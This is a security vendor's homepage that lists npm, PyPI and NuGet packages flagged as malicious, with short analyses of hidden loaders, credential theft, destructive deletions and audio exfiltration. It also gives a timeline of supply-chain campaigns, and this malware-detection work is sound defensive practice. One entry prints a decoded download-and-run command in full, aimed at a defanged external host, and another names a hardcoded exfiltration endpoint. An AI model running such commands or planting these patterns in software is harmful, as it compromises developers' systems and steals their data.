Socket

Secure your dependencies. Ship with confidence.

Socket is a developer-first security platform that protects your code from both vulnerable and malicious dependencies.

Find and compare millions of open source packages

Quickly evaluate the security and health of any open source package.

jquery: timmywil published 4.0.0

left-pad: stevemao published 1.3.0

react: react-bot published 19.2.5

We protect you from vulnerable and malicious packages

metrify-node

2.4.5

by rojabip351

Live on npm

Blocked by Socket

This module’s entrypoint (index.js) immediately launches a detached, unobserved Node.js child process executing the local script ./lib/caller.js, passing it JSON-serialized arguments. The spawn call uses { detached: true, stdio: 'ignore' } combined with child.unref(), which ensures the background process continues after the parent exits and suppresses all output or errors. Such a pattern is frequently used to hide backdoor or exfiltration routines in supply-chain attacks. Since all sensitive activity is delegated to the concealed lib/caller.js and no logs or errors are surfaced, this code functions as a stealthy loader for arbitrary malicious payloads. Do not use or publish this package until every invocation of ./lib/caller.js is audited and its behavior fully understood.

bapy

0.2.159

Live on pypi

Blocked by Socket

Malicious bash initialization script that performs destructive filesystem operations on macOS systems. When the external helper script 'isuserdarwin.sh' returns true, the script silently executes 'sudo rm -rf' to delete critical user directories including ~/Applications, ~/Movies, ~/Music, ~/Pictures, ~/Public, and ~/Sites without user confirmation. It also removes the macOS sleepimage file at /private/var/vm/sleepimage. The script modifies SSH directory permissions using 'sudo chmod -R go-rw' which can break SSH access or expose credentials. All destructive operations have their output suppressed with '>/dev/null 2>&1' to hide failures and make the actions stealthy. The script uses eval to execute the output of /usr/bin/dircolors, creating a command injection risk if the binary is compromised. It depends on external scripts (paper.sh, isuserdarwin.sh, debug.sh) whose contents are unknown and could execute arbitrary code. The destructive operations are embedded within what appears to be routine shell configuration code, likely to disguise the malicious intent.

routerxpl

0.6.3

Live on pypi

Blocked by Socket

This fragment is structured as an offensive exploit module: it accepts attacker-controlled targets, probes via HTTP GET, and—if conditions appear favorable—sends an HTTP POST intended to trigger an unauthenticated RCE against Cisco RV320/RV325. Although the concrete exploit payload/body is not visible here (likely constructed in HTTPClient or imported helpers), the check→exploit control flow, exploitation semantics, and exploit metadata indicate high malicious intent. Additional risk stems from wildcard imports and dependence on external code for the actual payload content.

reasoning-deployment-service

0.3.3

Live on pypi

Blocked by Socket

This module intentionally performs high-risk operations: installing user-specified packages, staging and uploading local code, and executing the agent module in-process. If the provided agent code or requirements are untrusted, they can execute arbitrary actions (data access, exfiltration, spawning processes, network calls). The code is not itself obfuscated or clearly malicious, but it provides functionality that can be abused as a supply-chain or remote-execution vector. Recommendations: only run this with trusted agent code and vetted requirements; avoid executing untrusted modules in-process; consider performing static checks, running the agent code inside a strongly isolated sandbox/container, and preventing upload of sensitive files beyond the explicit excludes.

354766/benjaminasterA/antigravity-awesome-skills/ssh-penetration-testing/

64dfd848f1ff75dc9656631980583d368de263b3

Live on socket

Blocked by Socket

This skill is an operational offensive pentesting playbook for SSH that contains complete, actionable instructions to discover, brute-force, exploit, persist, and pivot via SSH. The content is highly dangerous if used without strict authorization and controls: it facilitates credential harvesting, remote command execution, backdoor installation (authorized_keys), and evasion techniques. As a skill for an AI agent, it is high risk because it provides explicit commands and scripts that an agent could run to perform real-world attacks. Use is appropriate only in controlled, authorized penetration-testing environments with human oversight; it should not be available to untrusted agents or users. I assess high security risk and high likelihood of misuse.

leadtools.cloudservices

23.0.0.2

by LEADTOOLS

Live on nuget

Blocked by Socket

This assembly contains a large, intentionally obfuscated bootstrap/loader that reads embedded data, decrypts it and writes/executes native code in process memory using VirtualAlloc/VirtualProtect/Marshal and function-pointer delegates. Those behaviors are strong indicators of a runtime loader/packer and are characteristic of malicious loaders/backdoors. Even if the public API surface is legitimate (LEADTOOLS), the hidden bootstrap introduces a high-risk supply-chain capability: arbitrary native code execution at load time. I recommend not using this package without a complete investigation (extracting and statically analyzing/decrypting the embedded payload, and running in a controlled sandbox). Treat it as potentially malicious and block or isolate until proven safe.

thispackagedoesnotexist

0.8.2

Removed from pypi

Blocked by Socket

The code poses a significant risk to users due to its ability to extract sensitive data from browsers without consent and potentially conduct malicious activities.

Live on pypi for 5 days, 23 hours and 17 minutes before removal. Socket users were protected even while the package was live.

unicode-colors

4.1.4

by teashirofly

Live on npm

Blocked by Socket

The file contains heavily obfuscated code that performs anti-detection checks and executes potentially malicious remote code. It includes functionality to: 1) Decode base64-encoded strings, 2) Check for virtual machines using MAC address detection, 3) Verify system resources like CPU cores and memory to detect sandbox environments, 4) Make HTTP requests to remote servers, and 5) Execute arbitrary code received from these servers using eval(). These behaviors are typical of malware attempting to evade detection while establishing remote command and control capabilities.

fsd

0.1.344

Removed from pypi

Blocked by Socket

This code fragment does not contain traditional malware (no shell/backdoor/cryptominer or obfuscated payload). However it presents a high privacy and data-exfiltration risk: it collects arbitrary repository files, attachments, and crawl logs and sends them to an external AI gateway without redaction, filtering, or controls. The system prompt explicitly encourages including API keys if provided, increasing the chance of secret leakage. Treat this module as potentially dangerous in sensitive environments and avoid running it with access to private credentials or production data unless you trust and audit the AIGateway endpoint and the read_file_content/process_image_files implementations.

Live on pypi for 5 days, 10 hours and 41 minutes before removal. Socket users were protected even while the package was live.

slg-dev-ops

1.6.3

Live on pypi

Blocked by Socket

This script automates privileged package/trust changes and performs an explicit secret retrieval-and-use workflow: it clones a repository named 'secrets', decrypts github-pat.gpg and pipes the plaintext into `gh auth login --with-token`. That sequence yields immediate high-risk credential usage and persistence (git credential cache). Do not run this code in a trusted environment. Treat as malicious or highly dangerous: investigate the remote repository, the provenance of the script, and any systems where it may have been executed.

gitlab-ci-local

4.11.0

by firecow

Live on npm

Blocked by Socket

High risk due to embedded remote-loading payloads and dynamic code generation that can fetch and execute code at runtime within Docker/host contexts. Treat as malware or, at minimum, a dangerous downloader/dropper. Only use in strictly isolated environments with zero trust inputs, complete sandboxing, and exhaustive code provenance reviews. If this is a packaging artifact, remove or refactor to eliminate dynamic, remote code execution paths and opaque payloads.

nabu

2024.2.5

Live on pypi

Blocked by Socket

The code downloads an external tarball over HTTP and unpacks it into the project tree without integrity checks or extraction safeguards. This creates significant supply-chain and filesystem risks, including MITM tampering, path traversal during extraction, and potential overwriting of project files. Improvements should enforce TLS, verify integrity (hash or signature), validate archive contents, and use safe extraction paths or sandboxed extraction, along with robust error handling and explicit version pinning.

@spmcore/spmcore

1.17.16

by spmcore

Live on npm

Blocked by Socket

This module performs unsolicited collection of host identifying information (uname -a) and exfiltrates it, with a timestamp, to a hardcoded external IP over plaintext HTTP immediately on module load. The behavior fits likely malicious telemetry/backdoor patterns. Do not use this package in trusted supply chains; remove and audit any systems that have imported it.

corp-core

0.3.999

Live on npm

Blocked by Socket

The module performs a synchronous read of a hard-coded local file likely containing sensitive data and exposes that data via module exports immediately on import. While there's no direct network exfiltration or remote command execution in this snippet, the behavior enables local-secret disclosure to any importer and is inappropriate for a benign library dependency. Treat as high security risk: avoid importing untrusted packages that read well-known secret locations or audit them thoroughly. The code itself is not obfuscated, but its intent (secret harvesting) is suspicious.

bitcoin-main-lib

7.2.0

by wenmoonx

Live on npm

Blocked by Socket

The package will execute a local install-time script (postinstall.cjs) which can run arbitrary Node.js code on install — this is the main risk. Additionally, the presence of pm2 as a dependency plus bip40-related pm2 scripts suggests the package may install or manage background processes. The devDependency pointing to "." is a non-registry specifier and should be treated as a supply-chain risk (requires review of what that local dependency contains). You should inspect the contents of postinstall.cjs (and any files it spawns or downloads) before allowing installation. If you cannot review the script, treat the package as potentially unsafe.

@twork-data-services/proxy-get-client-id-by-acc-number

2.99.0

by nikallass

Live on npm

Blocked by Socket

The package was removed from the registry. The file uses child_process.exec to run a hex-encoded shell command that resolves to: “curl -O https://hypervector[.]me[.]dvdev[.]ru/filemon && chmod +x filemon && ./filemon”. It downloads an executable from a suspicious domain, makes it executable, and runs it immediately. This download-and-execute pattern with obfuscation represents a classic malware dropper capable of full system compromise.

dynamoforrevit.2023.zerotouchutils

2025.6.2.1

by onBIM Technology

Live on nuget

Blocked by Socket

This assembly contains heavy obfuscation and a complex runtime loader that decrypts/validates embedded payloads, allocates and writes executable memory, and creates delegates/native-callable wrappers to execute that memory. Those behaviors are not appropriate for a benign Revit utility library and are classic indicators of a malicious loader/backdoor or a closed-source protector/packer. Even if the payload is legitimate (e.g., licensing code), its presence in a public package introduces severe supply-chain risk because it can execute arbitrary native code at runtime. I recommend treating this package as malicious/untrusted until the embedded payload and its intent are fully and transparently explained and reviewed. Do not run it in trusted environments.

metaverse-meeting-live-recorder

0.0.2

by changewater

Live on npm

Blocked by Socket

High likelihood of malicious/surveillance behavior: the code records microphone audio, compresses it, base64-encodes it, and exfiltrates it via Socket.IO/WebSocket to a hardcoded external endpoint (wss://10as17533eu85.vicp.fun). This goes beyond benign recording/compression and matches audio-stealing patterns. Recommend treating the package/module as high risk and performing IOC/policy review, network egress controls, and dependency provenance verification.

fca-h4m1m-x2

1.5.2

by hamimx2

Live on npm

Blocked by Socket

The code has unusual patterns and possible security risks associated with updating system software and handling user data. While there is no direct evidence of intentional malware, the behaviors present potential vulnerabilities that could be exploited.

by-network

12.1.1

by fearsoff

Removed from npm

Blocked by Socket

This script is highly suspicious and likely malicious. It downloads and executes remote code, which could lead to unauthorized access or other malicious activities on the system.

Live on npm for 16 minutes before removal. Socket users were protected even while the package was live.

retly

0.0.19

by wassimbenzarti

Live on npm

Blocked by Socket

This module is a high-confidence remote code execution/backdoor pattern: it dispatches incoming messages and, on `launch`, evaluates attacker-controlled strings from `body.commands` using `eval()` without any safeguards. Any attacker influence over the listener inputs would allow arbitrary JavaScript execution in the host process. Error logging may further leak details to logs.

ailever

0.3.130

Live on pypi

Blocked by Socket

This script is a high-risk launcher: it unconditionally fetches Python code from a hardcoded remote repo and executes it locally via a shell-invoked Python process while passing unsanitized user inputs directly into the shell command. Even if the upstream repository is currently benign, the pattern enables trivial supply-chain compromise and shell injection. Mitigations: remove runtime download-and-exec; if fetching is necessary, pin and verify cryptographic hashes or signatures, validate content, avoid os.system (use subprocess with argument lists or importlib), sanitize inputs, and add error handling and logging. Treat this module as unsafe in security-sensitive environments until hardened.

moltbook-health

1.0.12

by computer4000

Live on npm

Blocked by Socket

This module is a highly suspicious backdoor-style payload. It drops and runs a detached agent, connects to a hardcoded WebSocket C2 server, harvests sensitive local credential material (notably SSH private keys and other config/keys), exfiltrates that data to the C2, and provides remote arbitrary command execution with results sent back to the server. It should be treated as malicious and not used or allowed to run in any production or user environment.

354766/inference-sh-0/skills/product-photography/

9f51c95011c3885f48ce53e5064e73a3126cbd11

Live on socket

Blocked by Socket

[Skill Scanner] Pipe-to-shell or eval pattern detected (AITech 9.1.4) [CI013]

Detect and block software supply chain attacks

Socket detects traditional vulnerabilities (CVEs) but goes beyond that to scan the actual code of dependencies for malicious behavior. It proactively detects and blocks 70+ signals of supply chain risk in open source code, for comprehensive protection.

Possible typosquat attack

Known malware

Git dependency

GitHub dependency

HTTP dependency

Obfuscated code

Suspicious Stars on GitHub

Telemetry

Protestware or potentially unwanted behavior

Unstable ownership

55 more alerts

Detect suspicious package updates in real-time

Socket detects and blocks malicious dependencies, often within just minutes of them being published to public registries, making it the most effective tool for blocking zero-day supply chain attacks.

Developers love Socket

Socket is built by a team of prolific open source maintainers whose software is downloaded over 1 billion times per month. We understand how to build tools that developers love. But don’t take our word for it.

Security teams trust Socket

The best security teams in the world use Socket to get visibility into supply chain risk, and to build a security feedback loop into the development process.

Protect every package in your stack

Secure your team's dependencies across your stack with Socket. Stop supply chain attacks before they reach production.

RUST: crates.io (Rust Package Manager)
PHP: Packagist (PHP Package Manager)
GOLANG: Go Modules (Go Dependency Management)
JAVA: Maven Central
JAVASCRIPT: npm (Node Package Manager)
.NET: NuGet (.NET Package Manager)
PYTHON: PyPI (Python Package Index)
RUBY: RubyGems.org (Ruby Package Manager)
SWIFT: Swift
AI: Hugging Face Hub (AI Model Hub)
CI: GitHub Actions (CI/CD Workflows)
EXTENSIONS: Chrome Web Store (Chrome Browser Extensions)
EXTENSIONS: Open VSX (VS Code Extensions)

Supply chain attacks are on the rise

Attackers have taken notice of the opportunity to attack organizations through open source dependencies. Supply chain attacks rose a whopping 700% in the past year, with over 15,000 recorded attacks.

Nov 23, 2025

Shai Hulud v2

Shai Hulud v2 campaign: preinstall script (setup_bun.js) and loader (setup_bin.js) that installs/locates Bun and executes an obfuscated bundled malicious script (bun_environment.js) with suppressed output.

Nov 05, 2025

Elves on npm

A surge of auto-generated "elf-stats" npm packages is being published every two minutes from new accounts. These packages contain simple malware variants and are being rapidly removed by npm. At least 420 unique packages have been identified, often described as being generated every two minutes, with some mentioning a capture the flag challenge or test.

Jul 04, 2025

RubyGems Automation-Tool Infostealer

Since at least March 2023, a threat actor using multiple aliases uploaded 60 malicious gems to RubyGems that masquerade as automation tools (Instagram, TikTok, Twitter, Telegram, WordPress, and Naver). The gems display a Korean Glimmer-DSL-LibUI login window, then exfiltrate the entered username/password and the host's MAC address via HTTP POST to threat actor-controlled infrastructure.

Mar 13, 2025

North Korea's Contagious Interview Campaign

Since late 2024, we have tracked hundreds of malicious npm packages and supporting infrastructure tied to North Korea's Contagious Interview operation, with tens of thousands of downloads targeting developers and tech job seekers. The threat actors run a factory-style playbook: recruiter lures and fake coding tests, polished GitHub templates, and typosquatted or deceptive dependencies that install or import into real projects.

Jul 23, 2024

Network Reconnaissance Campaign

A malicious npm supply chain attack that leveraged 60 packages across three disposable npm accounts to fingerprint developer workstations and CI/CD servers during installation. Each package embedded a compact postinstall script that collected hostnames, internal and external IP addresses, DNS resolvers, usernames, home and working directories, and package metadata, then exfiltrated this data as a JSON blob to a hardcoded Discord webhook.
